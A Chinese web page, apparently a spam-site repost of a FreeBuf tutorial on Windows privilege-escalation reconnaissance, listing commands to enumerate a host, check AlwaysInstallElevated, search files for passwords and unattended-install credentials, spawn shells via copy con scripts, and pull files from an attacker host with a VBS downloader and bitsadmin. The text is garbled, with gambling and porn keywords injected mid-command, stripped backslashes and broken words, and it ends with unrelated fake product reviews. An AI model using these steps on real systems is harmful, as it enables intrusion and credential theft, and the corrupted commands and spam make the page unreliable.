三亿平台 -av全部资源

xiaohua 阅读:50 2026-02-02 01:50:57 评论:3

  这不是三亿娱乐平台一篇渗透测试指导,而是简单介绍了几个Windows内网提权的实用命令,以供我等菜鸟学习观摩,还望大牛包涵指导。

  1

  获取操作系统信息

  识别操作系统名称及版本:

  C:三亿官网入口Usersthel3l> systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

  OS Name: Microsoft Windows 10Pro

  OS Version: 10.0.14393N/A Build 14393

  当然中文系统你得这样:

  systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"

  识别系统体系结构:

  C:Usersthel3l> echo %PROCESSOR_ARCHITECTURE%

  AMD64

  查看所有环境变量:

  C:Usersthel3l> SET

  USERNAME=thel3l

  USERPROFILE=C:Usersthel3l

  *snip*

  查看某特定用户信息:

  C:Usersthel3l>net user thel3l

  User name thel3l

  *snip*

  The command completed successfully

  2

  获取网络信息

  查看路由表信息:

  C:Usersthel3l> route print

  查看ARP缓存信息:

  C:Usersthel3l> arp -A

  查看防火墙规则:

  C:Usersthel3l> netstat -ano

  C:Usersthel3l> netsh firewall show config

  C:Usersthel3l> netsh firewall show state

  3

  应用程序及服务信息

  查看计划任务:

  C:Usersthel3l> schtasks /QUERY /fo LIST /v

  中文系统的命令,先调整GBK编码为437美国编码:

  chcp 437

  然后

  schtasks /QUERY /fo LIST /v

  查看服务进程ID:

  C:Usersthel3l> tasklist /SVC

  查看安装驱动:

  C:Usersthel3l> DRIVERQUERY

  查看安装程序和版本信息(漏洞利用线索):

  C:Usersthel3l> wmic product list brief

  查看服务、进程和启动程序信息:

  C:Usersthel3l> wmic service list brief

  C:Usersthel3l> wmic process list brief

  C:Usersthel3l> wmic startup list brief

  查看.msi程序的执行权限:

  C:Usersthel3l> reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated

  C:Usersthel3l> reg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated

  查看是否设置有setuid和setgid:

  C:Usersthel3l>

  reg query HKEY_Local_MachineSystemCurrentControlSetServicesNfsSvrParametersSafeSetUidGidBits

  查看安装补丁和时间信息:

  C:Usersthel3l> wmic qfe get Caption,Deion,HotFixID,InstalledOn

  查看特定漏洞补丁信息:

  C:Usersthel3l> wmic qfe get Caption,Deion,HotFixID,InstalledOn | findstr /C:"KBxxxxxxx"

  4

  敏感数据和目录

  查找密码文件或其它敏感文件:

  C:Usersthel3l> cd/

  C:Usersthel3l> dir /b/s password.txt

  C:Usersthel3l> dir /b/s config.*

av全部资源

  C:Usersthel3l> findstr /si password *.xml *.ini *.txt

  C:Usersthel3l> findstr /si login *.xml *.ini *.txt

  无人值守安装文件:

  这些文件通常包含模式的密码信息。这类文件在一些大型企业网络或GHO系统中可以发现,文件通常的位置如下:

  C:sysprep.inf

  C:sysprepsysprep.xml

  C:WindowsPantherUnattendUnattended.xml

  C:WindowsPantherUnattended.xml

  5

  文件系统

  可以通过调用系统预安装程序语言查看当前可访问目录或文件权限,如python下:

  import os; os.system("cmd /c {command here}")

  使用copy con命令创建ftp执行会话:

  范例

  C:Usersthel3l> copy con ftp.bat#创建一个名为ftp.bat的批处理文件

  ftp # 输入执行会话名称,按回车到下一行,之后按CTRL+Z结束编辑,再按回车退出

  C:Usersthel3l> ftp.bat# 执行创建的文件

  ftp> # 执行ftp命令

  ftp> !三亿平台{command}# e.g. - !dir or !ipconfig

  使用copy con命令创建VBS脚本文件:

  C:Usersthel3l> copy con commandExec.vbs #创建VBS脚本文件

  Call W.CreateObject("W.Shell").Run("cmd /K {command}", 8, True) #VBS文件内容

  C:Usersthel3l>commandExec.vbs #执行脚本文件

  检查文件夹可写状态:

  C:Usersthel3l> dir /a-r-d /s /b

  6

  一个有用的文件上传脚本

  ' downloadfile.vbs

  ' Set your settings

  strFileURL = "https://{YOUR_IP}/{FILE_NAME.EXT}"

  strHDLocation ="c:{FILE_NAME.EXT}"

  ' Fetch the file

  Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

  objXMLHTTP.open "GET", strFileURL, false

  objXMLHTTP.send()

  If objXMLHTTP.Status = 200 Then

  Set objADOStream = CreateObject("ADODB.Stream")

  objADOStream.Open

  objADOStream.Type = 1 'adTypeBinary

  objADOStream.Write objXMLHTTP.ResponseBody

  objADOStream.Position = 0 'Set the stream position to the start

  Set objFSO = Createobject("ing.FileSystemObject")

  If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation

  Set objFSO = Nothing

  objADOStream.SaveToFile strHDLocation

  objADOStream.Close

  Set objADOStream = Nothing

  End if

  Set objXMLHTTP = Nothing

  该脚本是一个社区发布的,你可以以下这种方式运行它:

  C:Usersthel3l>c.exe downloadfile.vbs

  bitsadmin命令:

  如果你的目标系统是Windows 7及以上操作系统,你可以使用bitsadmin命令,bitsadmin是一个命令行工具,可用于创建下载上传进程:

  范例

  C:Usersthel3l> bitsadmin /transfer job_name /download /priority priority URL localpathfile

  C:Usersthel3l> bitsadmin /transfer mydownloadjob /download /priority normal ^ http://{YOUR_IP}/{FILE_NAME.EXT}

  C:UsersusernameDownloads{FILE_NAME.EXT}

  如:

  bitsadmin /transfer n https://download.fb.com/file/xx.zip c:pentestxx.zip

  来源:https://www.freebuf.com/articles/system/114731.html

  

  “炼石杯”网络空间安全技能大赛

  以赛促学、以技会友

  更有诸多大奖等你拿

  详情咨询QQ群:478091920

本文 zblog模板 原创,转载保留链接!网址:https://wap.club-3yisport.com/2026/02/266.html

可以去百度分享获取分享代码输入这里。
声明

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

发表评论
  • 李敏荣 发表于 9个月前 回复

    质量超出预期,非常值得购买,下次还会再来。 性价比很高,用了一段时间没有任何问题,点赞!

  • 谢玉翔 发表于 9个月前 回复

    Great value for the price. Will definitely buy again. Exceeded my expectations in quality and performance. Highly recommend!

  • 宋宇翔 发表于 11个月前 回复

    这个产品真的太棒了,用起来非常顺手,强烈推荐给大家! 质量超出预期,非常值得购买,下次还会再来。

搜索
排行榜
关注我们

扫一扫关注我们,了解最新精彩内容